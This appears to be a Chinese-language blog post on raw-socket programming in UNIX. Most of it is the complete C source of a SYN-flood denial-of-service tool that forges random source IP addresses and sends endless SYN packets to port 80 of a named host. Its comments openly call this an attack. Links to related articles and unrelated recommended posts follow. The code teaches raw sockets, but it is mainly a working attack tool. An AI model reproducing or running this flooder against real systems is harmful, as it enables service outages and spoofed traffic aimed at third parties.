原始套接字(SOCK_RAW)。应用原始套接字,我们可以编写出由TCP和UDP套接字不能够实现的功能。

注意原始套接字只能够由有 root权限的人创建。

可以参考前面的博客<<UNIX网络编程——原始套接字的魔力【上】>>。

  1. /******************** DOS.c *****************/
  2. #include <stdlib.h>
  3. #include <stdio.h>
  4. #include <errno.h>
  5. #include <string.h>
  6. #include <unistd.h>
  7. #include <netdb.h>
  8. #include <sys/socket.h>
  9. #include <netinet/in.h>
  10. #include <sys/types.h>
  11. #include <arpa/inet.h>
  12.  
  13. #define DESTPORT 80 /* 要攻击的端口(WEB) */
  14. #define LOCALPORT 8888
  15.  
  16. void send_tcp(int sockfd,struct sockaddr_in *addr);
  17. unsigned short check_sum(unsigned short *addr,int len);
  18.  
  19. int main(int argc,char **argv)
  20. {
  21. int sockfd;
  22. struct sockaddr_in addr;
  23. struct hostent *host;
  24. int on=1;
  25.  
  26. if(argc!=2)
  27. {
  28. fprintf(stderr,"Usage:%s hostname\n\a",argv[0]);
  29. exit(1);
  30. }
  31.  
  32. bzero(&addr,sizeof(struct sockaddr_in));
  33. addr.sin_family=AF_INET;
  34. addr.sin_port=htons(DESTPORT);
  35.  
  36. if(inet_aton(argv[1],&addr.sin_addr)==0)
  37. {
  38. host=gethostbyname(argv[1]);
  39. if(host==NULL)
  40. {
  41. fprintf(stderr,"HostName Error:%s\n\a",hstrerror(h_errno));
  42. exit(1);
  43. }
  44. addr.sin_addr=*(struct in_addr *)(host->h_addr_list[0]);
  45. }
  46.  
  47. /**** 使用IPPROTO_TCP创建一个TCP的原始套接字 ****/
  48.  
  49. sockfd=socket(AF_INET,SOCK_RAW,IPPROTO_TCP);
  50. if(sockfd<0)
  51. {
  52. fprintf(stderr,"Socket Error:%s\n\a",strerror(errno));
  53. exit(1);
  54. }
  55. /******** 设置IP数据包格式,告诉系统内核模块IP数据包由我们自己来填写 ***/
  56.  
  57. setsockopt(sockfd,IPPROTO_IP,IP_HDRINCL,&on,sizeof(on));
  58.  
  59. /**** 没有办法,只用超级护用户才可以使用原始套接字 *********/
  60. setuid(getpid());
  61.  
  62. /********* 发送炸弹了!!!! ****/
  63. send_tcp(sockfd,&addr);
  64. }
  65.  
  66. /******* 发送炸弹的实现 *********/
  67. void send_tcp(int sockfd,struct sockaddr_in *addr)
  68. {
  69. char buffer[100]; /**** 用来放置我们的数据包 ****/
  70. struct ip *ip;
  71. struct tcphdr *tcp;
  72. int head_len;
  73.  
  74. /******* 我们的数据包实际上没有任何内容,所以长度就是两个结构的长度 ***/
  75.  
  76. head_len=sizeof(struct ip)+sizeof(struct tcphdr);
  77.  
  78. bzero(buffer,100);
  79.  
  80. /******** 填充IP数据包的头部,还记得IP的头格式吗? ******/
  81. ip=(struct ip *)buffer;
  82. ip->ip_v=IPVERSION; /** 版本一般的是 4 **/
  83. ip->ip_hl=sizeof(struct ip)>>2; /** IP数据包的头部长度 **/
  84. ip->ip_tos=0; /** 服务类型 **/
  85. ip->ip_len=htons(head_len); /** IP数据包的长度 **/
  86. ip->ip_id=0; /** 让系统去填写吧 **/
  87. ip->ip_off=0; /** 和上面一样,省点时间 **/
  88. ip->ip_ttl=MAXTTL; /** 最长的时间 255 **/
  89. ip->ip_p=IPPROTO_TCP; /** 我们要发的是 TCP包 **/
  90. ip->ip_sum=0; /** 校验和让系统去做 **/
  91. ip->ip_dst=addr->sin_addr; /** 我们攻击的对象 **/
  92.  
  93. /******* 开始填写TCP数据包 *****/
  94. tcp=(struct tcphdr *)(buffer +sizeof(struct ip));
  95. tcp->source=htons(LOCALPORT);
  96. tcp->dest=addr->sin_port; /** 目的端口 **/
  97. tcp->seq=random();
  98. tcp->ack_seq=0;
  99. tcp->doff=5;
  100. tcp->syn=1; /** 我要建立连接 **/
  101. tcp->check=0;
  102.  
  103. /** 好了,一切都准备好了.服务器,你准备好了没有?? ^_^ **/
  104. while(1)
  105. {
  106. /** 你不知道我是从那里来的,慢慢的去等吧! **/
  107. ip->ip_src.s_addr=random();
  108.  
  109. /** 什么都让系统做了,也没有多大的意思,还是让我们自己来校验头部吧 */
  110. /** 下面这条可有可无 */
  111. tcp->check=check_sum((unsigned short *)tcp,
  112. sizeof(struct tcphdr));
  113. sendto(sockfd,buffer,head_len,0,addr,sizeof(struct sockaddr_in));
  114. }
  115. }
  116.  
  117. /* 下面是首部校验和的算法,偷了别人的 */
  118. unsigned short check_sum(unsigned short *addr,int len)
  119. {
  120. register int nleft=len;
  121. register int sum=0;
  122. register short *w=addr;
  123. short answer=0;
  124.  
  125. while(nleft>1)
  126. {
  127. sum+=*w++;
  128. nleft-=2;
  129. }
  130. if(nleft==1)
  131. {
  132. *(unsigned char *)(&answer)=*(unsigned char *)w;
  133. sum+=answer;
  134. }
  135.  
  136. sum=(sum>>16)+(sum&0xffff);
  137. sum+=(sum>>16);
  138. answer=~sum;
  139. return(answer);
  140. }

UNIX网络编程——原始套接字(dos攻击)的更多相关文章

  1. UNIX网络编程——原始套接字的魔力【续】

    如何从链路层直接发送数据帧 上一篇里面提到的是从链路层"收发"数据,该篇是从链路层发送数据帧. 上一节我们主要研究了如何从链路层直接接收数据帧,可以通过bind函数来将原始套接字绑 ...

  2. UNIX网络编程——原始套接字的魔力【上】

    基于原始套接字编程 在开发面向连接的TCP和面向无连接的UDP程序时,我们所关心的核心问题在于数据收发层面,数据的传输特性由TCP或UDP来保证: 也就是说,对于TCP或UDP的程序开发,焦点在Dat ...

  3. UNIX网络编程——原始套接字SOCK_RAW

    实际上,我们常用的网络编程都是在应用层的报文的收发操作,也就是大多数程序员接触到的流式套接字(SOCK_STREAM)和数据包式套接字(SOCK_DGRAM).而这些数据包都是由系统提供的协议栈实现, ...

  4. UNIX网络编程——原始套接字的魔力【下】

    可以接收链路层MAC帧的原始套接字 前面我们介绍过了通过原始套接字socket(AF_INET, SOCK_RAW, protocol)我们可以直接实现自行构造整个IP报文,然后对其收发.提醒一点,在 ...

  5. Linux网络编程——原始套接字实例:MAC 头部报文分析

    通过<Linux网络编程——原始套接字编程>得知,我们可以通过原始套接字以及 recvfrom( ) 可以获取链路层的数据包,那我们接收的链路层数据包到底长什么样的呢? 链路层封包格式 M ...

  6. Linux网络编程——原始套接字能干什么?

    通常情况下程序员接所接触到的套接字(Socket)为两类: (1)流式套接字(SOCK_STREAM):一种面向连接的 Socket,针对于面向连接的TCP 服务应用: (2)数据报式套接字(SOCK ...

  7. unix网络编程——TCP套接字编程

    TCP客户端和服务端所需的基本套接字.服务器先启动,之后的某个时刻客户端启动并试图连接到服务器.之后客户端向服务器发送请求,服务器处理请求,并给客户端一个响应.该过程一直持续下去,直到客户端关闭,给服 ...

  8. Linux网络编程——原始套接字编程

    原始套接字编程和之前的 UDP 编程差不多,无非就是创建一个套接字后,通过这个套接字接收数据或者发送数据.区别在于,原始套接字可以自行组装数据包(伪装本地 IP,本地 MAC),可以接收本机网卡上所有 ...

  9. LINUX 网络编程 原始套接字

    一 原始套接字 原始套接字(SOCK_RAW)是一种不同于SOCK_STREAM.SOCK_DGRAM的套接字,它实现于系统核心.然而,原始套接字能做什么呢?首先来说,普通的套接字无法处理ICMP.I ...

随机推荐

  1. [NOIp 2017]逛公园

    Description 策策同学特别喜欢逛公园.公园可以看成一张$N$个点$M$条边构成的有向图,且没有 自环和重边.其中1号点是公园的入口,$N$号点是公园的出口,每条边有一个非负权值, 代表策策经 ...

  2. ●洛谷P1291 [SHOI2002]百事世界杯之旅

    题链: https://www.luogu.org/recordnew/show/5861351题解: dp,期望 定义dp[i]表示还剩下i个盖子没收集时,期望还需要多少次才能手机完. 初始值:dp ...

  3. 【LSGDOJ 1351】关灯

    题目描述 多瑞卡得到了一份有趣而高薪的工作.每天早晨他必须关掉他所在村庄的街灯.所有的街灯都被设置在一条直路的同一侧. 多瑞卡每晚到早晨 5 点钟都在晚会上,然后他开始关灯.开始时,他站在某一盏路灯的 ...

  4. hdu 5052 树链剖分

    Yaoge’s maximum profit Time Limit: 10000/5000 MS (Java/Others)    Memory Limit: 65536/65536 K (Java/ ...

  5. bzoj2434阿狸的自动机

    转载自 http://www.cnblogs.com/zj75211/p/6934976.html ●BZOJ 2434: [Noi2011]阿狸的打字机   ●赘述题目 (题意就不赘述了) ●解法: ...

  6. 【完整项目】使用Scrapy模拟HTTP POST,获取完美名字

    1. 背景 最近有人委托我给小孩起个名字,说名字最好符合周易五行生克理论,然后给了我个网址,说像是这个网站中的八字测名,输入名字和生辰八字等信息,会给出来这个名字的分数和对未来人生的预测.当父母的自然 ...

  7. Python中模块之sys的功能介绍

    sys模块的功能介绍 1. sys的变量 argv 命令行参数 方法:sys.argv 返回值:list 例如:test1.py文件中有两句语句1.import sys 2.print(sys.arg ...

  8. 10分钟 5步 发布以太坊 ERC20 代币

    1.安装 METAMASK Brings Ethereum to your browser 一个可以浏览器上进行操作的以太坊钱包,推荐 Chrome. Chrome 插件安装地址: https://c ...

  9. IOS和OSX事件传递机制

    本文ios部分转载自: http://zhoon.github.io/ios/2015/04/12/ios-event.html iOS的事件有好几种:Touch Events(触摸事件).Motio ...

  10. select动态绑定vue.js

    <select v-model="selected"> <option v-for="option in options" v-bind:va ...